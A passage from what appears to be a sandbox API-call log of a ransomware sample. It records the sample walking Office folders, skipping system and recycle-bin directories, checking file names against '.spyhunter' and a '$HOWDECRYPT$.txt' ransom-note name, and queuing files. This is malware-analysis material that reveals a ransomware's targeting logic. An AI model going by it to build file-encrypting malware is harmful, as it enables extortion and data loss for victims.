0x384fe0 [0087.468] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa68) returned 0x3867e8 [0087.468] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.468] lstrcmpiW (lpString1="MSORES.DLL", lpString2="Windows") returned -1 [0087.469] lstrlenW (lpString="Windows") returned 7 [0087.469] lstrcmpiW (lpString1="MSORES.DLL", lpString2="$Recycle.bin") returned 1 [0087.469] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.469] lstrcmpiW (lpString1="MSORES.DLL", lpString2="System Volume Information") returned -1 [0087.469] lstrlenW (lpString="System Volume Information") returned 25 [0087.469] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL") returned 70 [0087.469] StrStrIW (lpFirst="MSORES.DLL", lpSrch=".spyhunter") returned 0x0 [0087.469] lstrcmpW (lpString1="MSORES.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.469] lstrcmpW (lpString1="MSORES.DLL", lpString2="_uninstalling_.png") returned 1 [0087.469] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL") returned 70 [0087.469] GetProcessHeap () returned 0x2c0000 [0087.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x340878 [0087.469] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa70) returned 0x3867e8 [0087.469] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.469] lstrcmpiW (lpString1="msoshext.dll", lpString2="Windows") returned -1 [0087.469] lstrlenW (lpString="Windows") returned 7 [0087.469] lstrcmpiW (lpString1="msoshext.dll", lpString2="$Recycle.bin") returned 1 [0087.469] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.469] lstrcmpiW (lpString1="msoshext.dll", lpString2="System Volume Information") returned -1 [0087.469] lstrlenW (lpString="System Volume Information") returned 25 [0087.469] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 72 [0087.469] StrStrIW (lpFirst="msoshext.dll", lpSrch=".spyhunter") returned 0x0 [0087.469] lstrcmpW (lpString1="msoshext.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.469] lstrcmpW (lpString1="msoshext.dll", lpString2="_uninstalling_.png") returned 1 [0087.469] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 72 [0087.470] GetProcessHeap () returned 0x2c0000 [0087.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x3850c0 [0087.470] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa78) returned 0x3867e8 [0087.470] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.470] lstrcmpiW (lpString1="MSOXEV.DLL", lpString2="Windows") returned -1 [0087.470] lstrlenW (lpString="Windows") returned 7 [0087.470] lstrcmpiW (lpString1="MSOXEV.DLL", lpString2="$Recycle.bin") returned 1 [0087.470] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.470] lstrcmpiW (lpString1="MSOXEV.DLL", lpString2="System Volume Information") returned -1 [0087.470] lstrlenW (lpString="System Volume Information") returned 25 [0087.470] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL") returned 70 [0087.470] StrStrIW (lpFirst="MSOXEV.DLL", lpSrch=".spyhunter") returned 0x0 [0087.470] lstrcmpW (lpString1="MSOXEV.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.470] lstrcmpW (lpString1="MSOXEV.DLL", lpString2="_uninstalling_.png") returned 1 [0087.470] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL") returned 70 [0087.471] GetProcessHeap () returned 0x2c0000 [0087.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x340950 [0087.471] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa80) returned 0x3867e8 [0087.471] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.471] lstrcmpiW (lpString1="MSOXMLED.EXE", lpString2="Windows") returned -1 [0087.471] lstrlenW (lpString="Windows") returned 7 [0087.471] lstrcmpiW (lpString1="MSOXMLED.EXE", lpString2="$Recycle.bin") returned 1 [0087.471] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.471] lstrcmpiW (lpString1="MSOXMLED.EXE", lpString2="System Volume Information") returned -1 [0087.472] lstrlenW (lpString="System Volume Information") returned 25 [0087.472] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE") returned 72 [0087.472] StrStrIW (lpFirst="MSOXMLED.EXE", lpSrch=".spyhunter") returned 0x0 [0087.472] lstrcmpW (lpString1="MSOXMLED.EXE", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.472] lstrcmpW (lpString1="MSOXMLED.EXE", lpString2="_uninstalling_.png") returned 1 [0087.472] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE") returned 72 [0087.472] GetProcessHeap () returned 0x2c0000 [0087.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x3851a0 [0087.472] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa88) returned 0x3867e8 [0087.472] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.472] lstrcmpiW (lpString1="MSOXMLMF.DLL", lpString2="Windows") returned -1 [0087.472] lstrlenW (lpString="Windows") returned 7 [0087.472] lstrcmpiW (lpString1="MSOXMLMF.DLL", lpString2="$Recycle.bin") returned 1 [0087.472] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.472] lstrcmpiW (lpString1="MSOXMLMF.DLL", lpString2="System Volume Information") returned -1 [0087.472] lstrlenW (lpString="System Volume Information") returned 25 [0087.472] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLMF.DLL") returned 72 [0087.472] StrStrIW (lpFirst="MSOXMLMF.DLL", lpSrch=".spyhunter") returned 0x0 [0087.472] lstrcmpW (lpString1="MSOXMLMF.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.472] lstrcmpW (lpString1="MSOXMLMF.DLL", lpString2="_uninstalling_.png") returned 1 [0087.472] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLMF.DLL") returned 72 [0087.472] GetProcessHeap () returned 0x2c0000 [0087.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x385280 [0087.472] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa90) returned 0x3867e8 [0087.473] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.473] lstrcmpiW (lpString1="MSPTLS.DLL", lpString2="Windows") returned -1 [0087.473] lstrlenW (lpString="Windows") returned 7 [0087.473] lstrcmpiW (lpString1="MSPTLS.DLL", lpString2="$Recycle.bin") returned 1 [0087.473] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.473] lstrcmpiW (lpString1="MSPTLS.DLL", lpString2="System Volume Information") returned -1 [0087.473] lstrlenW (lpString="System Volume Information") returned 25 [0087.473] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL") returned 70 [0087.473] StrStrIW (lpFirst="MSPTLS.DLL", lpSrch=".spyhunter") returned 0x0 [0087.473] lstrcmpW (lpString1="MSPTLS.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.473] lstrcmpW (lpString1="MSPTLS.DLL", lpString2="_uninstalling_.png") returned 1 [0087.473] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL") returned 70 [0087.473] GetProcessHeap () returned 0x2c0000 [0087.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x340a28 [0087.473] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa98) returned 0x3867e8 [0087.473] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.473] lstrcmpiW (lpString1="MSSOAP30.DLL", lpString2="Windows") returned -1 [0087.473] lstrlenW (lpString="Windows") returned 7 [0087.473] lstrcmpiW (lpString1="MSSOAP30.DLL", lpString2="$Recycle.bin") returned 1 [0087.478] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.478] lstrcmpiW (lpString1="MSSOAP30.DLL", lpString2="System Volume Information") returned -1 [0087.478] lstrlenW (lpString="System Volume Information") returned 25 [0087.478] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL") returned 72 [0087.478] StrStrIW (lpFirst="MSSOAP30.DLL", lpSrch=".spyhunter") returned 0x0 [0087.478] lstrcmpW (lpString1="MSSOAP30.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.478] lstrcmpW (lpString1="MSSOAP30.DLL", lpString2="_uninstalling_.png") returned 1 [0087.478] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL") returned 72 [0087.478] GetProcessHeap () returned 0x2c0000 [0087.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x385280 [0087.479] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa88) returned 0x3867e8 [0087.479] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.479] lstrcmpiW (lpString1="MUAUTH.CAB", lpString2="Windows") returned -1 [0087.479] lstrlenW (lpString="Windows") returned 7 [0087.479] lstrcmpiW (lpString1="MUAUTH.CAB", lpString2="$Recycle.bin") returned 1 [0087.479] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.479] lstrcmpiW (lpString1="MUAUTH.CAB", lpString2="System Volume Information") returned -1 [0087.479] lstrlenW (lpString="System Volume Information") returned 25 [0087.479] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB") returned 70 [0087.479] StrStrIW (lpFirst="MUAUTH.CAB", lpSrch=".spyhunter") returned 0x0 [0087.479] lstrcmpW (lpString1="MUAUTH.CAB", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.479] lstrcmpW (lpString1="MUAUTH.CAB", lpString2="_uninstalling_.png") returned 1 [0087.479] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB") returned 70 [0087.479] GetProcessHeap () returned 0x2c0000 [0087.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x340b00 [0087.479] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa90) returned 0x3867e8 [0087.479] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.479] lstrcmpiW (lpString1="MUOPTIN.DLL", lpString2="Windows") returned -1 [0087.479] lstrlenW (lpString="Windows") returned 7 [0087.479] lstrcmpiW (lpString1="MUOPTIN.DLL", lpString2="$Recycle.bin") returned 1 [0087.479] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.479] lstrcmpiW (lpString1="MUOPTIN.DLL", lpString2="System Volume Information") returned -1 [0087.479] lstrlenW (lpString="System Volume Information") returned 25 [0087.479] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL") returned 71 [0087.479] StrStrIW (lpFirst="MUOPTIN.DLL", lpSrch=".spyhunter") returned 0x0 [0087.479] lstrcmpW (lpString1="MUOPTIN.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.479] lstrcmpW (lpString1="MUOPTIN.DLL", lpString2="_uninstalling_.png") returned 1 [0087.480] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL") returned 71 [0087.480] GetProcessHeap () returned 0x2c0000 [0087.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x340bd8 [0087.480] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa98) returned 0x3867e8 [0087.480] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.480] lstrcmpiW (lpString1="Oarpmany.exe", lpString2="Windows") returned -1 [0087.480] lstrlenW (lpString="Windows") returned 7 [0087.480] lstrcmpiW (lpString1="Oarpmany.exe", lpString2="$Recycle.bin") returned 1 [0087.480] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.480] lstrcmpiW (lpString1="Oarpmany.exe", lpString2="System Volume Information") returned -1 [0087.480] lstrlenW (lpString="System Volume Information") returned 25 [0087.480] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe") returned 72 [0087.480] StrStrIW (lpFirst="Oarpmany.exe", lpSrch=".spyhunter") returned 0x0 [0087.480] lstrcmpW (lpString1="Oarpmany.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.480] lstrcmpW (lpString1="Oarpmany.exe", lpString2="_uninstalling_.png") returned 1 [0087.480] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe") returned 72 [0087.480] GetProcessHeap () returned 0x2c0000 [0087.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x385360 [0087.480] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xaa0) returned 0x3867e8 [0087.480] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.480] lstrcmpiW (lpString1="ODBCMON.DLL", lpString2="Windows") returned -1 [0087.480] lstrlenW (lpString="Windows") returned 7 [0087.480] lstrcmpiW (lpString1="ODBCMON.DLL", lpString2="$Recycle.bin") returned 1 [0087.480] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.480] lstrcmpiW (lpString1="ODBCMON.DLL", lpString2="System Volume Information") returned -1 [0087.480] lstrlenW (lpString="System Volume Information") returned 25 [0087.480] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL") returned 71 [0087.480] StrStrIW (lpFirst="ODBCMON.DLL", lpSrch=".spyhunter") returned 0x0 [0087.480] lstrcmpW (lpString1="ODBCMON.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.481] lstrcmpW (lpString1="ODBCMON.DLL", lpString2="_uninstalling_.png") returned 1 [0087.481] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL") returned 71 [0087.481] GetProcessHeap () returned 0x2c0000 [0087.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x340cb0 [0087.481] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xaa8) returned 0x3867e8 [0087.481] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.481] lstrcmpiW (lpString1="Office Setup Controller", lpString2="Windows") returned -1 [0087.481] lstrlenW (lpString="Windows") returned 7 [0087.481] lstrcmpiW (lpString1="Office Setup Controller", lpString2="$Recycle.bin") returned 1 [0087.481] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.481] lstrcmpiW (lpString1="Office Setup Controller", lpString2="System Volume Information") returned -1 [0087.481] lstrlenW (lpString="System Volume Information") returned 25 [0087.481] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller") returned 83 [0087.481] lstrcmpW (lpString1="Office Setup Controller", lpString2=".") returned 1 [0087.481] lstrcmpW (lpString1="Office Setup Controller", lpString2="..") returned 1 [0087.481] GetProcessHeap () returned 0x2c0000 [0087.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.481] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\*") returned 85 [0087.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.652] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.652] lstrlenW (lpString="Windows") returned 7 [0087.652] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.652] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.652] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.652] lstrlenW (lpString="System Volume Information") returned 25 [0087.652] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\.") returned 85 [0087.652] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.652] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.665] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.665] lstrlenW (lpString="Windows") returned 7 [0087.665] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.665] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.665] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.665] lstrlenW (lpString="System Volume Information") returned 25 [0087.666] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\..") returned 86 [0087.666] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.666] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.666] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.666] lstrcmpiW (lpString1="Access.en-us", lpString2="Windows") returned -1 [0087.666] lstrlenW (lpString="Windows") returned 7 [0087.666] lstrcmpiW (lpString1="Access.en-us", lpString2="$Recycle.bin") returned 1 [0087.666] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.666] lstrcmpiW (lpString1="Access.en-us", lpString2="System Volume Information") returned -1 [0087.666] lstrlenW (lpString="System Volume Information") returned 25 [0087.666] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us") returned 96 [0087.666] lstrcmpW (lpString1="Access.en-us", lpString2=".") returned 1 [0087.666] lstrcmpW (lpString1="Access.en-us", lpString2="..") returned 1 [0087.666] GetProcessHeap () returned 0x2c0000 [0087.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x387298 [0087.666] wnsprintfW (in: pszDest=0x387298, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*") returned 98 [0087.666] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0087.729] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.729] lstrlenW (lpString="Windows") returned 7 [0087.729] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.729] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.729] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.729] lstrlenW (lpString="System Volume Information") returned 25 [0087.729] wnsprintfW (in: pszDest=0x387298, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\.") returned 98 [0087.729] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.729] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.729] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.729] lstrlenW (lpString="Windows") returned 7 [0087.729] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.729] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.729] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.729] lstrlenW (lpString="System Volume Information") returned 25 [0087.730] wnsprintfW (in: pszDest=0x387298, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\..") returned 99 [0087.730] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.730] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.730] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.730] lstrcmpiW (lpString1="AccessMUI.XML", lpString2="Windows") returned -1 [0087.730] lstrlenW (lpString="Windows") returned 7 [0087.730] lstrcmpiW (lpString1="AccessMUI.XML", lpString2="$Recycle.bin") returned 1 [0087.730] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.730] lstrcmpiW (lpString1="AccessMUI.XML", lpString2="System Volume Information") returned -1 [0087.730] lstrlenW (lpString="System Volume Information") returned 25 [0087.730] wnsprintfW (in: pszDest=0x387298, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 110 [0087.730] StrStrIW (lpFirst="AccessMUI.XML", lpSrch=".spyhunter") returned 0x0 [0087.730] lstrcmpW (lpString1="AccessMUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.730] lstrcmpW (lpString1="AccessMUI.XML", lpString2="_uninstalling_.png") returned 1 [0087.730] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 110 [0087.730] GetProcessHeap () returned 0x2c0000 [0087.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11e) returned 0x3846a0 [0087.730] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa78) returned 0x3867e8 [0087.730] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.730] lstrcmpiW (lpString1="AccessMUISet.XML", lpString2="Windows") returned -1 [0087.730] lstrlenW (lpString="Windows") returned 7 [0087.730] lstrcmpiW (lpString1="AccessMUISet.XML", lpString2="$Recycle.bin") returned 1 [0087.730] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.730] lstrcmpiW (lpString1="AccessMUISet.XML", lpString2="System Volume Information") returned -1 [0087.730] lstrlenW (lpString="System Volume Information") returned 25 [0087.730] wnsprintfW (in: pszDest=0x387298, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 113 [0087.730] StrStrIW (lpFirst="AccessMUISet.XML", lpSrch=".spyhunter") returned 0x0 [0087.731] lstrcmpW (lpString1="AccessMUISet.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.731] lstrcmpW (lpString1="AccessMUISet.XML", lpString2="_uninstalling_.png") returned 1 [0087.731] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 113 [0087.731] GetProcessHeap () returned 0x2c0000 [0087.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x124) returned 0x353830 [0087.731] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa80) returned 0x3867e8 [0087.731] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.731] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0087.731] lstrlenW (lpString="Windows") returned 7 [0087.731] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0087.731] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.731] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0087.731] lstrlenW (lpString="System Volume Information") returned 25 [0087.731] wnsprintfW (in: pszDest=0x387298, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 106 [0087.731] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0087.731] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.731] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0087.731] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 106 [0087.731] GetProcessHeap () returned 0x2c0000 [0087.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x116) returned 0x353960 [0087.731] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa88) returned 0x3867e8 [0087.731] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0087.731] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0087.732] wnsprintfW (in: pszDest=0x387298, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\$HOWDECRYPT$.txt") returned 113 [0087.732] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\$HOWDECRYPT$.txt") returned 113 [0087.732] GetProcessHeap () returned 0x2c0000 [0087.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x124) returned 0x353a80 [0087.732] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa90) returned 0x3867e8 [0087.741] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.742] lstrcmpiW (lpString1="Excel.en-us", lpString2="Windows") returned -1 [0087.742] lstrlenW (lpString="Windows") returned 7 [0087.742] lstrcmpiW (lpString1="Excel.en-us", lpString2="$Recycle.bin") 